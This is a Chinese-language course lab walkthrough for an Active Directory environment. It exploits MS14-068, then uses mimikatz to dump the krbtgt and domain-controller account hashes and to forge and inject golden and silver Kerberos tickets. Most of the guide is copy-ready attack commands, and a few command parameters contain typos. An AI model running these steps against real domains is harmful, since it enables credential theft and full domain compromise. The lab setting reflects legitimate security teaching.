
工具清单:只用 mimikatz + MS14-068.py(pykek),跟着敲即可。
实验5小项拆分:①建域用户→②MS14-068漏洞利用(出报错即完成)→③黄金票据→④白银票据→⑤三张票据总结
前置准备
域控:DC-WS2012(Win2012R2)管理员administrator登录
客户机:Win7 使用域用户alex-zhy登录桌面(后面要用这个机器操作票据导入)
工具提前丢进Win7桌面:
mimikatz.exe(x64版本)
MS14-068.exe(pykek漏洞脚本),Win7装python2.7运行脚本
步骤1:域控CMD新建域用户alex-zhy(密码永不过期,实验第一条)
打开域控【管理员CMD】逐条输入(alex-xxx和密码都是自己随便起的):
:: 创建用户,密码自定义 P@ss123456
net user alex-zhy P@ss123456 /add /domain
:: 设置密码永不过期
net user alex-zhy /domain /expires:never
:: 查看用户是否创建成功
net user alex-zhy /domain成功:用户出现在域用户列表,密码永久有效,第一步完成。

额外:Win7先查2个关键参数(
后面漏洞要用)
在Win7(alex-zhy用户打开CMD)
查当前域SID(记下来S-1-5-21-xxxx,后面金银票全用)
wmic useraccount where name='alex-zhy' get sid,domain记录:
域名:
LYH.COM(后面都用ABC.COMd代替)用户:
alex-dhc@LYH.COM(后面都用alex-zhy代替)
步骤2:MS14-068(CVE-2014-6324)漏洞利用(实验第2项:2012R2必然报错,出现指定提示=完成)
原理:漏洞构造恶意TGT票据,2012R2系统带补丁拦截(2008及之前漏洞仍然存在),访问c$弹出报错文字=实验得分,不需要提权成功
① Win7 CMD执行,生成恶意ccache票据
Win7桌面打开CMD,切换到工具目录,生成MS14票据:
MS14-068.exe -u alex-zhy@ABC.COM -s S-1-5-21-【你的域SID】 -d dc-ws2012.ABC.COM运行成功后桌面生成:alex-zhy.ccache(恶意TGT票据文件)

② mimikatz导入票据(PTT票据注入)
Win7右键以管理员身份运行mimikatz.exe,输入:
kerberos::ptt alex-zhy.ccache提示File 'xxx.ccache' imported=导入成功

③ 访问域控共享,复现实验截图报错
dir \\dc-ws2012\c$
或者
dir \\192.168.1.10\c$(域控ip)
实验结束(2012R2补丁拦截,报错就是实验要求结果,不用进目录)
步骤3:黄金票据Golden Ticket(实验第3项,alex导入金票正常访问域控C$)
金票前置:域控机器提取krbtgt账户NTLM哈希(仅域控管理员操作)

域控cmd输入hostname拿到计算机名(后面要用)
3.1 域控管理员运行mimikatz,导出krbtgt哈希
域控管理员打开mimikatz:
lsadump::lsa /inject /name:krbtgt输出格式:krbtgt:::aad3b435b51404ee:【32位NTLM哈希值】
保存两个数据:
krbtgt的32位NTLM
完整域SID(S-1-5-21-xxxx)

3.2 Win7(alex-zhy)mimikatz生成并注入黄金票据
Win7管理员打开mimikatz,替换参数执行:
kerberos::golden /user:administrator /domain:ABC.COM /sid:S-1-5-21:【你的域SID】 /krbtgt:【krbtgt的32位NTLM】 /ptt提示票据注入成功。

3.3 验证访问域控
dir \\dc-ws2012\c$
或者
dir \\192.168.1.10\c$(域控ip)✅ 成功列出域控C盘文件,第三步完成。

黄金票本质:伪造全域TGT授权票据,万能通行证,域内所有机器都能进。
步骤4:白银票据Silver Ticket(实验第4项,单主机单服务ST票据)
银票前置:域控提取域控机器账号 DC-WS2012$ 的NTLM哈希(域控mimikatz操作)
域控cmd输入hostname拿到计算机名(后面要用)

4.1 域控提取DC机器账号哈希
域控mimikatz:
lsadump::lsa /patch找到账户:DC-WS2012$:::aad3b435b51404ee:【32位NTLM】,记录这个NTLM

4.2 Win7生成并注入银票(CIFS服务专用,对应c$共享)
Win7 mimikatz执行(替换参数):
kerberos::silver /user:administrator /domain:ABC.COM /sid:S-1-5-21-【域SID】 /target:dc-ws2012.ABC.COM /service:CIFS /rc4:【DC-WS2012$的NTLM值】 /ptt
4.3 验证访问
dir \\dc-ws2012\c$
或者
dir \\192.168.1.10\c$(域控ip)正常列出目录,第四步完成。

银票特点:只针对dc-ws2012的CIFS共享生效,不能访问别的域内主机。
三张票据区别
1.MS14-068漏洞票据(恶意TGT)
利用Kerberos协议漏洞,普通域用户非法构造伪造TGT授权票据,试图绕过KDC权限校验提升至域管;Win2012R2系统补丁修复该漏洞,访问域控时被安全机制拦截,弹出安全告警,仅低版本2008R2及以下无补丁环境可提权成功。
2.黄金票据Golden Ticket(伪造全域TGT票据)
依赖域krbtgt账户NTLM哈希,伪造任意域用户的TGT授权票据,属于域全局万能通行证;导入票据后可访问域内所有服务器、所有共享资源,权限覆盖整个域环境。
3.白银票据Silver Ticket(伪造单服务ST票据)
依赖目标主机机器账号NTLM哈希,仅伪造指定主机的单个服务(本实验CIFS)的ST服务票据;只能访问目标主机对应服务(dc-ws2012的c$),无法横向访问其他域设备,权限范围受限。